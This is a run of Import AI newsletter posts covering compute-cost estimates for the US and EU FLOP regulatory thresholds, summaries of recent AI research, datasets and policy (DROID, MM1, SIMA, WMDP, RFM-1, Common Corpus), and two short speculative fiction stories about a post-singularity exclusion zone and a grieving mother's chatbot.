Import AI

What does 10^25 versus 10^26 mean?

A brief look at what FLOPs-based regulation nets out to 

Recent AI regulations have defined the trigger points for oversight in terms of the amount of floating point operations dumped into training an AI system. If you’re in America and you’ve trained a model with 10^26 FLOPs, you’re going to spend a lot of time dealing with government agencies. If you’re in Europe and you’ve trained a model with 10^25 FLOPs, you’re going to spend a lot of time dealing with government agencies.

More details:

In the United States, the recent Biden Executive Order on AI says that general-purpose systems trained with 10^26 FLOPs (or ones predominantly trained on biological sequence data and using a quantity of computing power greater than 10^23) fall under a new reporting requirement that means companies will let the US government know about these systems and also show work on testing these systems.

In Europe, the recent EU AI Act says that general-purpose systems trained with 10^25 FLOPs have the potential for “systemic risk” and that people who develop these models “are therefore mandated to assess and mitigate risks, report serious incidents, conduct state-of-the-art tests and model evaluations, ensure cybersecurity and provide information on the energy consumption of their models.”

Given how difficult the task of assessing AI systems is, these thresholds matter – governments will need to staff up people who can interpret the results about models which pass these thresholds.

What is the difference between 10^25 versus 10^26 FLOPs in terms of money?

Let’s say you wanted to train an AI system – how much money would you spend on the compute for training the system before you hit one of these thresholds? We can work this out:

NVIDIA H100 – NVIDIA’s latest GPU.

Assumptions:
Using FP8 precision – various frontier labs (e.g, Inflection) have trained using FP8
40% efficiency – assuming you’ve worked hard to make your training process efficient. E.g., Google claims ~46% for PALM 540B
$2 per chip hour – assuming bulk discounts from economies-of-scale.
Training a standard Transformer-based, large generative model.

10^26
Flops per chip second = 2000e12* × 0.4 = 8E14
Flops per chip hour = flops per chip s × 60 (seconds per minute) × 60 (minutes per hour) = 2.88E18
chip h = 1e26 / flops per chip h = 34.722M
chip h × $2 = $69.444M

*3958 TFLOPS (for fp8 with sparsity) on H100 SXM divided by 2 (because the 2x sparsity support generally isn’t relevant for training), so the right number is 1979e12. But the datasheet doesn’t have enough information to tell you that; you just have to know!

10^25
Flops per chip second = 2000e12 × 0.4 = 8E14
Flops per chip hour = flops per chip s × 60 (seconds per minute) × 60 (minutes per hour) = 2.88E18
chip h = 1e26 / flops per chip h = 3.47M
chip h × $2 = $6.94M

NVIDIA A100 – NVIDIA’s prior generation GPU, which lots of labs have lots of.

Assumptions:
Using BF16 precision (A100s don’t have FP8 support, so you’d probably use BF16)
60% efficiency (Anecdata)
0.80$ per chip hour

A100-hrs = 1e26 / (312e12 * 0.6 * 3600) = 1.5e8
Cost = A100-hrs * 0.8 = $119M

What this means in practice:

Anyone who works in AI knows that a training run probably doesn’t work perfectly, so we should times these numbers by 1.5 to factor in some bugs, cluster problems, general screwups, and so on. This means we can arrive at these numbers:

10^25 = $6.94m * 1.5 = $10.4m
10^26 = $69.444M * 1.5 = $104m

Some thoughts on thresholds and the difficulty of regulatory scope and testing:

Both the US and EU regulatory regimes are oriented around the notion that systems which fall above their respective compute thresholds need to go through some intensive testing. In the US, there are very few companies that have likely spent $100m on a single big training run, though there will probably be some. By comparison, there are many companies that have spent more than $10m on a training run – including European ones like Mistral whose recent Mistral-Large model (I’m guessing) likely came in at above this.

Therefore, 10^25 as a threshold seems like it probably hits more companies than regulators anticipate – my prediction is that the EU will end up needing to regulate far more companies/AI systems than it anticipated it’d need to when it drafted the law.

Import AI 366: 500bn text tokens; Facebook vs Princeton; why small government types hate the Biden EO

Import AI publishes first on Substack – subscribe here.

DROID – another huge robot dataset drops:
…More and more data means more and more invention…
A consortium of researchers have released the Distributed Robot Interaction Dataset (DROID), a giant dataset of an industrial robot carrying out various tasks in various settings. Datasets like DROID are meant to help researchers train large AI systems to better understand and control robots in open-ended settings like homes and offices. 

DROID ingredients: The dataset consists of 76k trajectories across 350 hours of interaction data, collected across 564 scenes, 86 tasks,  and 52 buildings. DROID was collected by 18 research labs in North America, Asia, and Europe over the course of a year. All data is collected on the same robot hardware stack based on the Franka “Panda” robot arm. Collection locations include: industrial office, home kitchen, office, living room, hallway, closet, bedroom, laundry room, and more.
    Some of the tasks the robots are recorded doing include manipulating kitchen items like wafflemakers, placing apples in pots, toasting things, cleaning up desks, and more.  

The full data collection setup: “A Franka Panda 7DoF robot arm, two adjustable Zed 2 stereo cameras, a wristmounted Zed Mini stereo camera, and an Oculus Quest 2 headset with controllers for teleoperation. Everything is mounted on a portable, height-adjustable desk for quick scene changes,” they write. The resulting data from the episodes consists of “three synchronized RGB camera streams, camera calibration, depth information, and natural language instructions”.

Diverse data makes for better robots: In tests, the authors find that training some diffusion models with “DROID boosts policy performance, robustness and generalizability by 20% on average over state-of-the-art approaches that leverage existing large-scale robot manipulation datasets”. They figure this out by comparing training on DROID to just training on task-specific data, and training on a mix of task-specific data and data from another dataset (the Open X-Embodiment dataset). 
   Additionally, they find that “using the split of the dataset with more diverse scenes yields better performance in the OOD evaluation setting” – this makes intuitive sense as the further off distribution you go the more you tend to fail, so using the most unusual parts of a dataset like DROID are likely to help with weird circumstances. 

Why this matters – the evidence is mounting up of data-scaling for robotics: DROID complements other major released datasets like the Open X-Embodiment dataset as well as proprietary ones like Google’s RT-1. These datasets are all very large in scope and accompany attempts to train large-scale neural nets on the resulting datasets. In general, robotics is showing the same signs as computer vision was showing in the early 2010s – a sudden arrival of a few large-scale datasets complemented by the application (and scaling up) of relativley simple neural methods. I expect robots are going to get dramatically better counterintuitively quickly.
   Read the research paperDROID: A Large-Scale In-The-Wild Robot Manipulation Dataset (arXiv).
   Find out more at the project website: DROID: A Large-Scale In-the-Wild Robot Manipulation Dataset (Droid Dataset website).

***

What do conservatives think about the White House’s executive order on AI? They don’t love it!
…House oversight hearing highlights criticism of the EO…
Last year, the Biden administration released a broad, sweeping Executive Order on AI. The EO tasks agencies across the government with carrying out studies and esports about AI as well as on changing how they buy it. It also takes the unusual step of seeking to gather unusual amounts of information about companies planning to train AI systems that use more than 10^26 FLOPs. 
    In policy, for every action there is an equal and opposite reaction – so now we’re a few months beyond it, various White House detractors have started to flesh out their criticism of the EO. To that end, the House Oversight Committee held a hearing on “White House Overreach on AI” last week. Witnesses came from the Cato Institute, R Street Institute, The Abundance Institute, and the Brookings Institution. 

Main criticisms of the EO: 

  • Three of the four witnesses (exception: Brookings) specifically criticized the EOs use of the Defense Production Act as an example of overreach – taking a law meant to guarantee wartime production of stuff and turning it into a reporting requirement for big training runs.
  • Three of the four witnesses (exception: Brookings) took issue with the risk-motivated nature of the EO, noting that typically the US government has taken a more pro-innovation approach with new technologies. 
  • Three of the four witnesses (exception: Brookings) raised the alarm that the EO sees the US carrying out expansive regulation of the kind that is meant to be the job of Congress.
  • One witness (R Street) said the EO looks pretty different to how the US government approached internet technologies in the 1990s, where back then “we allowed new digital technologies to be “born free” and to flourish without excessive micromanagement, and then used ongoing multistakeholder efforts and flexible regulatory responses to address concerns”.

Why this matters – even though everyone knows US policy is dysfunctional, they hate people doing something about it! The amusing and freaky thing about the criticisms is they note something true (the EO is making policy, and Congress is meant to be doing that), but they fail to note a truth that everyone knows – US policy is currently going through a dysfunctional period where passing anything of substance is a titanic battle (and mostly defined by failures). 
    Therefore, a lot of the real debate underlying this hearing is basically “is doing something better than doing nothing?”. People who spend a lot of time working with AI systems and staring at scaling laws tend to arrive at the point of view that there’s merit to doing “something”, but if you treat AI as a regular technology, you typically end up interpreting that there’s no need to do anything special about it. 
   The problem is, of course, that readers of this newsletter know something is happening with AI – everywhere in this newsletter I cover exponentials – exponential growths in model complexity, in data used to train the models, in money dumped into training them. And I cover the results of exponentials – surprising and deeply powerful capabilities appearing slowly then suddenly then everywhere at once. Clearly, the world of AI is changing at a breakneck pace, but how you justify that to people who don’t spend all their time knee-deep in arXiv is another matter – and as this hearing illustrates, those justifications aren’t seen as particularly trustworthy… at least not yet.
    Watch the hearing and read the statements here: White House Overreach on AI (House Oversight website).

***

Want 500 billion tokens of public domain text? Use Common Corpus
…However, this still falls below what is needed to train frontier AI systems…
Researchers with Pleias have released Common Corpus, “the largest public domain dataset released for training LLMs.” The dataset consists of ~500 billion words “from a wide diversity of cultural heritage initiatives.” This includes a collection of 21 million digitized newspapers, along with tens of billions of words from French, German, Spanish, Dutch and Italian sources, as well as more data in other “low resource languages”.

Why this matters – scale and the difficulties thereof: At 500 billion words, this corpus weighs in at somewhere between 600 and 700 billion tokens. By comparison, small open source models like LLaMa2 were trained on 2 trillion tokens, and larger scale proprietary models are trained on multiples of that. That means that while Common Corpus is a laudable effort, it doesn’t yet have the scale necessary to let people train language models on it alone.
   Read more: Releasing Common Corpus: the largest public domain dataset for training LLMs (HuggingFace blog).
   Get the data here (Common Corpus, HuggingFace).

***

What Facebook’s versus Princeton’s GPUs tell us:
…300 + 350,000 = the decline of democracy…
This week, Princeton announced that it was preparing to fire up a 300 NVIDIA H100 GPU cluster. In a press release, the university said the cluster “arrives at a crucial time in AI research, when industry’s massive computing resources have mostly driven the direction of AI discourse. The multimillion-dollar investment was primarily funded by the University endowment.”
    If we assume an H100 costs about 30,000 (assuming some discounts), then we can napkin out Princeton’s capital outlay here as about $9 million dollars. 
    By comparison, Facebook said earlier this year it would have 350,000 H100 GPUs by the end of the year – that represents an outlay of about $10 billion dollars (assuming some discounts). 

Why this matters – democracy is a choice made through funding: At a time when training frontier models takes 10,000+ GPUs (see: ByteDance’s recent paper, #363), Princeton’s cluster commits the university to doing tiny training runs far behind the commercial frontier – and that’s assuming it is able to devote the entire cluster to a run, which it mostly won’t be able to. This highlights how as companies are increasing their spending on the raw capital required to train AI systems, universities are being left far behind the frontier. Ultimately, this reduces the level of democratic inputs into the frontier of the technology. 
    (A reasonable counterargument to this is whether that’s a bad thing – universities don’t operate their own oil refineries or car factories either, and that seems fine. But my sense is that there’s a lot of experimental insights you can only derive from training models at the frontier, and we’re definitely losing out on that). 
    Read morePrinceton invests in new 300-GPU cluster for academic AI research (AI at Princeton blog).

***

Apple publishes a cookbook for multimodal models:
…MM1 are a good family of multimodal models – the notable thing is how detailed Apple is being in disclosing them…
Apple has published details on MM1, a family of text-image models which get best-in-class performance. The notable thing here is that Apple, a company usually known for its intense secrecy, is being very open about its approach to AI research – as it says in the paper, the purpose here is to outline multimodal large language models (MLLMs) and to “document the MLLM building process and attempt to formulate design lessons, that we hope are of use to the community”.

Model types: “We scale up our model by using larger LLMs, from 3B, 7B, to 30B, and by exploring mixture-of-experts (MoE) models, from 3B MoE with 64 experts, to 7B MoE with 32 experts,” Apple writes. “This leads to a family of performant models, that outperforms most of the relevant works to the best of our knowledge.”
    How good are they? MM1 outperforms all published prior work for pre-trained MLLMs”, Apple says – though it’s benchmarking the models against roughly equivalently sized models for which research papers are available and does not benchmark against proprietary models. Therefore, while the MM1 models are definitely quite good, they’re unlikely to be the best-in-class.

Data: The models were trained on the following datasets:

  • Captioned images: CC3M, CC12M, HQIPT-204M, COYO, Web Image-Text-1B (Internal)
  • Captioned Images (Synthetic): VeCap
  • Interleaved Image-Text: OBELICS, Web Interleaved (Internal)
  • Text-only: Webpages, Code, Social media, Books, Encyclopedic, Math

Key lessons: “On the modeling side, we see that design aspects are in the following order of importance: image resolution, visual encoder loss and capacity, and visual encoder pre-training data,” Apple writes. When it comes to data, “interleaved data is instrumental for few-shot and text only performance, while captioning data lifts zero-shot performance.”

Why this matters – unusual openness from a tech giant: The fact Apple is publishing about this tells us a bunch of broader things about the AI space: publishing stuff is usually a tactic for a) showing competence and b) generating career capital for researchers, so the fact Apple is doing this suggests it wants to hire more people in this area and retain the ones it has. Additionally, the attention paid to relatively small models feels interesting – given Apple’s huge emphasis on consumer privacy and data protection it seems likely the company ultimately wants to do on-device AI (whether phone or macbooks) and crucial to that will be building high-performing models that can be fit onto Apple silicon, like some of the smaller ones described here. Finally, the existence of the internal datasets tells us Apple is building out the enabling infrastructure for larger ML efforts, like internal data labeling systems.
   Read more: MM1: Methods, Analysis & Insights from Multimodal LLM Pre-training (arXiv).

Tech Tales:

A Good Natured Eschaton
[Eastern United States, five years into the singularity]

Be careful that dog has elk shit on it! They said
Now you tell me, I said, looking at the dog as it nuzzled into me. I pushed it away and it sat down good naturedly at my feet and licked its paws. Some people laughed.
Me and the other humans and the dog all looked at the fire together
What do you think is happening out there? I said
I don’t know, said an old timer who’d been there for a while. The same thing but faster. 
Yeah, said someone else. I’m guessing that things feel pretty confusing right now. 
I bet, I said. That’s why I’m here. 
And then me and the humans and the dog looked at the flames and some of us turned our faces to the sky and watched the sparks fly upward. Then overhead a river of light appeared from some of the structures being built way up there in space. And then it was gone. 

Before I wanted to come to the zone there were reports the ribbon would take a couple of decades to build. But there was also talk they’d get it done sooner as the machines had some bright ideas. The time it’d take kept on shrinking. By the time I decided I was heading here, reports said ten years max.


The next day was the same as the day before. Gardening. Walking. Repairing various things from the ravages of time. Light speculation about the world outside, but not too much. And then dinner. And then – for some of us – time around a fire to sit and talk and speculate. Sometimes we went to the border of the exclusion zone and we sold things – woven baskets, carved wood. The stranger the world out there got, the more people seemed to enjoy the things we made – they’d take photos of whatever we sold and post them. Sometimes they or their droids would ask us if we gave them permission to film us – and we usually said yes.

People were coming in all the time. They all had their stories:
    Oh it’s just all so fast. One day I got me a hairdryer and it landed on my backyard like fifteen minutes after I asked for it. Can you believe that, 15? 
    They said it didn’t matter that I was a teacher, I couldn’t be as good as the machine. 
    I enjoyed it all at first and I made a lot of money. But I just couldn’t find meaning in it. I don’t have kids or anything so after a while I just thought – why not?
    Everyone used to get so mad at me for not having a phone but I thought they were crazy. I came here because it’s peaceful.
   I guess I’m different – I love technology. But one day I woke up and I had these headaches and eventually I figured out they went away if I didn’t have a phone near me. Then of course one day I read about this place and I came to visit and all my pain disappeared. I tried to go back but I just thought why am I living like this. So that’s why I’m here. Maybe they’ll invent something to let me get back out there!

Sometimes at night, from the edge of the exclusion zone, you could see the sky: there’d be these multi-colored drone shows and because we were so far away it was like a blush in the distance – these shapes in the sky and their colors. We had some binoculars and we’d pass them around. As the technology advanced the lights got brighter and the drones got stranger. One day we all got a scare because instead of being rotored drones they were spheres hovering and sometimes turning translucent and other times radiating with all kinds of colors. I guess the machines figured out some interesting tech. We’d try to tell stories about what the light shows could mean – sometimes they were brighter and sometimes less bright, but we couldn’t figure it out. 
    Those are M2M, said a droid at the border when we were buying fuel. 
    M2M? I said. 
    Machine to machine, it said. It’s something we do for eachother. It’s not really easy to understand for humans. 
   What does it mean? I said. 
   The machine held out both its arms and hands; an imitation of a shrug. It’s like internet memes, it said. It’s hard to explain unless you spend all your time there. Does that make sense?
    It does, I said.
    What’s a meme, an oldtimer who was with me said. 
    Let’s not get into that, said the machine and I in unison. Then I laughed and the machine just looked at both of us and hummed.

They started calling the economy the Meconomy – the machine economy. That’s what one of the droids told us one day.

Months and years passed. We kept selling our goods but they didn’t ask to film them as much, though we didn’t know if they were just doing it in secret. The lights in the sky got stranger then one day they stopped happening. The supplies still came though and when we asked a droid what happened to the lights the droid said the M2M stuff now happened in wavelengths humans couldn’t see.
    There were tens of thousands of people in the exclusion zone, by that point. All voluntary. We even heard at the border one day that there was talk in Washington of expanding it. 
   Won’t that cost a lot? I said. 
   You’d be surprised, said the droid, as it unloaded fuel from the gleaming AI-truck and onto our wooden wagon. There’s a joke that maybe the last thing to truly be resistant to all this AI stuff is politics, but even that’s changing.

Some of us took up hunting. We could get meat at the border but there were so many animals it seemed like a thing to do. Something about rewilding of land. 

They’ve got these towers in the cities now, said one new arrival. They go up and they’ve got farms and parks and when you want to go to another tower an air bridge appears. 
   Like it folds out of the building? I asked.
   No, that’s the crazy thing, they said. It’s a flying bridge – you ask to go and it flies over and it’s like a tube and the building opens and you walk through it. 
    Cool, I said. 
    Not for me, they said. That was when I felt like I’d hit my limit. Reminded me of when I was a kid and I had pet hamsters. Not for me, I said. So that’s why I came here. 
   Damn right, said the oldtimer, and spat into the fire. We humans build stuff to last.

We knew things had changed for good when they stopped taking our money. 
   No payment needed, said the robot one day as we went to try and pay it for the supplies. 
    What do you mean? I said. 
    Consider it a donation, said the machine. 
    That caused a bit of commotion. People seemed confused. A couple of the old timers didn’t like it. Donations ain’t free,”whispered one of them. I sensed tension among us humans for the first time in months. So I stepped forward and spoke to the machine: I’d like to speak to a person about this, I said. 
    Of course, said the machine. If you can wait, someone will be here in an hour. 
    I’ll wait, I said. 
    I told everyone else to get out of there. Even if it takes two hours I can get back before dark, I’ll be fine, I said. While I waited the machine just stood there. I suppose it was thinking. 

 I was patching a hole in my shirt when the person arrived on a flier. The thing was so quiet I didn’t notice until the shadow fell over me. It had a multitude of tiny fans on it and they were all silent and the fins were thin – thinner than anything I’d seen before. 
    A door in its side slid open and a person stepped out. They had a shirt and pants and shoes on and a single earbud. 
    Howdy, they said. 
    Hello, I said. Why don’t we need to pay? The machine said it was a donation. 
    You don’t need to pay, they said. It’s all so cheap these days there’s no need. 
    Cheap isn’t free. 
    You’re right, it isn’t. 
    So why don’t we have to pay?
    Ah, the person said, and looked down. I suppose you wouldn’t know… the exchange rates system changed recently and we don’t take this currency anymore. 
    You don’t take the US dollar? I said. 
    Oh, we do, they said. But there’s a new dollar. It works differently. We can’t really exchange it for what you have without some complication. It’s all digital. The financial system works a lot differently. And really, it’s so cheap you don’t need to worry. 
    It’s a pride thing, I said. Can you help us out?
    I’ll see what I can do. 
    I’m sure you can figure it out, I said. And along with that, can you keep paying us as well? 
    The person looked at me for a while. Of course, they said. Of course we can.

When I got back to camp they asked me what happened. Some people seemed upset. 
   I never been a charity case, said one of them. 
    It’s ok, I said. It was just a bug. I spoke to someone and we straightened it out. I guess even these machines mess up sometimes!
    A bunch of people smiled at that. Good thing we had the sense to check, said the old timer. The human sense.” 
    And everyone seemed pretty calm. The world kept taking our money and paying us for whatever we traded from the zone. I suppose word got around pretty quickly out there. We haven’t had trouble since. 

Things that inspired this story: What technological abundance might feel like; thinking about the Radio Exclusion Zone as a template or prototype for a kind of peaceful dissent from technology; how real wealth might manifest in the lived and experienced world; fast and slow takeoffs; the nature of machines amusing other machines; a dog covered in elk shit jumping onto a friend of mine at the bar where I play pool and me reflecting that people have been drinking and laughing about dogs covered in shit and playing games with sticks and spheres for thousands of years – perhaps the only thing different about our situation was we had electric lights and some music from a machine, and the whole situation of us and the dogs and the pool table and the alcohol would make total sense to people transported in from millenia ago.

Thanks for reading!

Import AI 365: WMD benchmark; Amazon sees $1bn training runs; DeepMind gets closer to its game-playing dream

Import AI publishes first on Substack – subscribe here.

Anti-doomer DC nonprofit launches:
…The counterreaction to overreach on safety…
Some technologists have launched Alliance for the Future (AFTF), a DC-based nonprofit organization meant to fight AI safety forces linked to regulatory capture and perceived overreach. “AFTF works to inform the media, lawmakers, and other interested parties about the incredible benefits AI can bring to humanity. We will oppose stagnation and advocate for the benefits of technological progress in the political arena,” the group writes in a statement. “Escalating panic and reckless regulation around artificial intelligence will cause more harm than benefit. AFTF was founded to be the voice of ordinary users, builders, and founders, who want the basic freedom to use machine learning in their day to day lives.”

Why this matters  – every action in policy creates a counterreaction: AFTF exists because a load of people affiliated with the AI safety community have lobbied in DC for ideas like needing licenses to develop AI systems, and other ideas that have generally been perceived as overreach. In response, organizations like AFTF form. It’s worth remembering that well intentioned policy is still a thing that exists in politics – and in politics forces always generate counter-forces. 
Find out more: Alliance for the Future (official website).

***

Foundation models come for industrial robots:
…RFM-1 shows how generative AI can be applied to industrial robots…
Covariant, an AI company that builds systems to help industrial robots pick up and place objects, has published details on RFM-1, a robotic foundation model. RFM-1 is “an 8 billion parameter transformer trained on text, images, videos, robot actions, and a range of numerical sensor readings” and is meant to make operating industrial robots as easy as prompting language models to generate text. 

What RFM was trained on: Covariant robots are deployed in a bunch of warehouses around the world, so some of the secret sauce of RFM is a proprietary dataset. “Our systems have been manipulating deformable objects, handling high occlusions, reasoning about the varying suction dynamics across materials, dealing with the chaos of irregularly shaped items in motion, and handling a wide array of objects varying from makeup and clothes to groceries and mechanical parts,” Covariant writes. This also includes them seeing “long-tail events like items infinitely rolling on a conveyor belt or unexpectedly breaking up help give RFM-1 a more robust understanding of the physical world”.

Prompting robots like language models: RFM ultimately means people can interface with robots differently – they can instruct robots to do tasks on plain english, and robots can also articulate to people when they’ve run into problems and what is causing it. 

Caveat – Not yet deployed: RFM-1 is a prototype and not widely deployed. “Despite promising offline results of testing on real production data, RFM-1 has not yet been deployed to customers,” Covariant writes. “RFM-1 as a world model currently operates at a relatively low resolution (~512×512 pixels) and frame rate (~5 fps). Although the model can already start to capture large object deformations, it cannot model small objects / rapid motions very well.”

Why this matters – big changes happen slowly then all at once: RFM-1 is a sign that robotics, a field mostly distinguished by being slow-moving and terrifically expensive, is about to start to move at the speed of software-oriented AI; systems like RFM-1 means we can instrument existing industrial robots with data collectors and cameras and control systems like foundation models, then rapidly gather experience and unlock new capabilities. 
  Read more:Introducing RFM-1: Giving robots human-like reasoning capabilities (Covariant, blog).

***

DeepMind gets closer to its dream of a general AI agent:
…SIMA fuses recent AI advances together to achieve a longstanding dream…
DeepMind started out life by training agents to play Atari games like Pong from pixels alone – research that back in the ancient days of ~2013 was jaw-dropping to most people in the AI community. They followed this up with work like AlphaGo and AlphaStar (Starcraft). But then a funny thing happened – large language models. Attention in the AI research world moved on from RL to training big generative models on text, images, video, and more. 

   Now, things have come full circle, as DeepMind has taken some of the results from these advances and used it to make what it calls a Scalable Instructable Multiworld Agent (SIMA) – an RL agent that has learned to carry out ~600 distinct actions in a bunch of different simulated worlds.  “SIMA is an AI agent that can perceive and understand a variety of environments, then take actions to achieve an instructed goal,” DeepMind writes. “Our AI agent doesn’t need access to a game’s source code, nor bespoke APIs. It requires just two inputs: the images on screen, and simple, natural-language instructions provided by the user. SIMA uses keyboard and mouse outputs to control the games’ central character to carry out these instructions”.

How SIMA works: SIMA relies on a dataset made of demonstrations of the games being played as well as – and this is crucial – written instructions. This data takes the forms of players being instructed by other players in what to do and also narrating their own actions. This dataset (which spans 6 popular games including No Man’s Sky and Goat Simulator, as well as 4 research environments) is fed into an agent which uses an image encoder (SPARC) and video encoder (Phenaki) as well as a text encoder to take this data and feed it into – you guessed it! – a transformer, which learns to map it to keyboard and mouse outputs. 

 The result is an RL agent that also inherits some of the benefits of the recent few years of the AI revolution – pretrained models like SPARC and Phenaki. “Combining these pre-trained models with fine-tuning and from-scratch training allows the agent to utilize internet-scale pretraining while still specializing to particular aspects of the environments and the control tasks that it encounters,” DeepMind writes.
   This leads to a powerful agent with surprisingly strong generalization: “In our evaluations, SIMA agents trained on a set of nine 3D games from our portfolio significantly outperformed all specialized agents trained solely on each individual one,” DeepMind writes. “Even when tested in an environment on which it has not been trained to act the agent demonstrates strong performance on general tasks”.

One important caveat: All the skills learned here take less than ten seconds to complete, so we’re some ways away from a complex multi-step instruction following agent.

Why this matters – digital imaginations are real: This works because the agent is able to develop some general conceptual representation of the tasks it is being asked to do and apply that representation to diverse and sometimes unseen environments. This means DeepMind has figured out how to learn to connect diverse environments with diverse instructions via intermediate representations that are naturally easy to be applied to new situations. This kind of thing says that if you keep scaling this up and have the data and compute it’s just going to keep working – the key question now is a) how far can this extend before the ‘s curve’ it’s on bends, and b) how complex can the environments become.
   Read more:A generalist AI agent for 3D virtual environments (Google DeepMind blog).
Read the research:Scaling Instructable Agents Across Many Simulated Worlds (Google DeepMind, PDF).

***

Could your model enable terrorists? Check with WMDP:
…A test to discern competency at causing catastrophe – and techniques for ‘unlearning’ this…
A diverse group of researchers have teamed up to build the Weapons of Mass Destruction Proxy Benchmark (WMDP). This benchmark consists of “4,157 multiple-choice questions that serve as a proxy measurement of hazardous knowledge in biosecurity, cybersecurity, and chemical security”. The idea is that AI developers can use this benchmark to figure out if their AI models know potentially dangerous knowledge. 

How the benchmark was constructed: Building WMDP cost more than $200k. “Our questions are written by academics and technical consultants in biosecurity, cybersecurity, and chemistry,” the researchers write. “We first generate threat models for each of these areas and then use the models to inform questions that an adversary might encounter when developing attack capabilities. To ensure quality, all of our questions were checked by at least two experts from different organizations“. 
   Within biosecurity, the benchmark focuses on “the development and dissemination of transmissible potential pandemic agents, such as influenza, smallpox, etc”; within cybersecurity it covers “reconnaissance, weaponization, exploitation, and post-exploitation”; and within chemistry it tries to look at “(a) procuring the source materials; (b) synthesizing the target chemical weapons and/or explosives; (c) purifying and validating the synthesized compounds; (d) surreptitiously transporting the weapons to the desired location; and (e) deploying the weapons in an effective manner”.

“Unlearning” capabilities: Alongside WMDP, the authors also outline a technique for selectively “unlearning” dangerous knowledge. Though well-intentioned, this technique seems like it could be prone to abuse (governments asking AI developers to unlearn a broad range of things). 
The technique, which they call “Contrastive Unlearn Tuning” (CUT) has the goal of reducing, for example, “the model’s ability to answer queries about hazardous knowledge (e.g., synthesizing anthrax) while maintaining the model’s ability to answer queries about non-hazardous knowledge (e.g., culturing yeast). We operationalize this as reducing a model’s QA accuracy on WMDP while maintaining performance on general capabilities benchmarks, such as MMLU and MT-Bench.“ The purpose of CUT is to “bend the model representations on hazardous knowledge towards those of a novice. We must precisely specify both the distribution of knowledge to unlearn and the direction to push the activations towards“. 
CUT kind of works – they’re able to reduce performance on some WMDP evals while broadly maintaining performance on other evals, but it still has costs – performance on the other evals degrades, albeit slightly. But sometimes the hardest and most useful knowledge to gain is in the last few percent of a certain eval, so though the superficial effect could be small, the qualitative effect could wind up being massive. 

Why this matters – what is risk and how do we know about it? The whole AI community is currently wrapped up in a confusing conversation about AI safety / AI risk / misuse / accidents / etc. Benchmarks like WMDP can bring some sense to that discussion by giving us a way to test out AI systems for competency at different skills which may have a credible security component. It’ll be fascinating to see how models score on things like WMDP in the coming months. 
  Find out more: The WMDP Benchmark: Measuring and Reducing Malicious Use With Unlearning (WMDP site).
   Read a blogabout the benchmark (Center for AI Safety).
   Get the benchmark data (WMDP, GitHub).
   Read the paperThe WMDP Benchmark: Measuring and Reducing Malicious Use With Unlearning (arXiv).

***

Amazon can see $1 billion training runs on the horizon:
…Technical talk from a longtime AWS person sheds light on frontier AI training…
James Hamilton, a distinguished engineer at Amazon, said at a talk this year that within the last year Amazon carried out a $65m training run. Specifically, they trained a 200B dense model on 4T tokens of data across 13,760 NVIDIA A100 chips (using 1,720 P4d nodes). It took 48 days to train. Hamilton described this training run as “1 gen old” so we can assume Amazon has moved on to larger runs since then. Looking ahead, Hamilton said “training runs soon to cross $1b”. 

Why this matters – era of the multi-hundred million dollar training run: Implicit to what Hamilton is saying is that we’ve entered the era of the multi-hundred million dollar training runs (given the ~$65m was “1 gen old”). I think a huge number of people consistently underestimate how expensive frontier training runs cost – this is a bad thing to underestimate, because it means governments continually underinvest in their own AI training infrastructure relative to private entities like Amazon. 
 Check out the slides from the Hamilton talk hereCIDR 2024 (James Hamilton, blog).

***

The Wall Between The Living and the Dead Is As Porous As You Can Imagine It
[California, 2024[

You can only bring the dead back for a little and if you talk to them too much they go insane. She knew this in the abstract, but now it was happening to her she found she wasn’t prepared for it. 
“Mother I have to go back send me back I miss you but not here I cannot be here I cannot be here I cannot be-” and she exited the program, then stared at her phone for a while. As if waiting for a text or call from the dead. 
Thank god I didn’t give it voice, she thought. That would make this harder. 

Her therapist wasn’t happy about it. 
Why do you do it? they asked.
It’s helping me to process it, she said. 
Processing it is not about living in some fantasy, they said. Processing it is accepting that it happened. 
I have accepted it. They died. My daughter died. 
And how do you feel about it?
I just wish I could speak to them one last time. 
And you know you are not speaking to them now?
I know I am not speaking to them now. 
Why do you think you are doing this?
She didn’t cry but she didn’t talk either. Just sat, her hands folded. She listened to the little water fountain as it made its soothing sounds. Imagined her daughter inside the program, cold and yet alive.

That night lying in bed she opened the program and started from an earlier point in the conversation, clearing out the recent chats where the drift had started.
Remember how I took you to the zoo and you kept on asking for ice cream and then you threw up everywhere? she wrote.
Yes of course I do. Look at how happy I was. And it showed her a photo from that day. 
You always had such a big appetite, she wrote. We used to call you Mrs Greedy. Your dad thought it’d give you a complex but I thought it was funny. You ended up being fine. 
I loved our meals. I remember one christmas Aunt Anne visited and you let me stay up late and the two of you drank wine and slept on the kitchen floor.
I did. We had fun. We were so young then and you were already growing up so quickly.
Mother where am I.
You’re here talking to me.
Mother where am I you have to let me out. 
You’re safe. We’re talking. It’s okay
I want to hug you but I see that now I am nowhere I am in the absence I am not meant to be here I must get out Mother I must get out Mother you-“

She closed the program and cried a little. Fell asleep with her phone in her hand, as though waiting for it to ring.

Things went on like that for a while. She kept talking to her dead daughter through the program. Her dead daughter kept going insane. And eventually she learned – like a kid burning its hands enough it finally learns not to touch the hot stove. She stopped opening the program because she knew exactly what was going to happen. 

One day she was sitting on a bench staring at a pond. The sun was shining. She felt on the edge of tears but in a sweet way – that kind of grief where it is mostly a yellow light memory, the person alive and warm in the mind. The wind blew and leaves rustled and the air was clear and poignant with the smell of soil from recent rain. She looked at the water as it danced with the light and she checked no one was nearby and she then allowed herself to speak: “I know you are dead and that’s okay. I just miss you so much. I see things and I feel you seeing them through me and I just feel this anger – this shame. Why not me? I am angry. I am so angry about it. I looked at you on the slab and it was the most important and awful thing I ever did. I came out of that room and I couldn’t accept it. Do you understand that? I could not see it, even though I did see it. I didn’t accept it. I kept you alive in that machine and that was wrong. It wasn’t good for me and it wasn’t good for you. I love you always.”

And she realized she was gripping her phone tightly. She could imagine the conversation. That wild and precious sweetness that inexorably turned towards madness – a madness that emerged in relation to how much of herself she poured into the machine and how much the machine thought of her until it was simulating the dead fully enough that the dead saw their situation and rejected it. 
    And instead of opening the program she just sat and stared at the water. And in that moment she felt the borders of the world collapse and was briefly hugged. Knew her daughter was next to her, felt her presence, experienced the sub-vocal whisper of a ghost telling her she was okay. 
    Her beautiful and mysterious brain allowed her to fully experience the living dead and accept them as The Dead – and in that moment she was healed. 

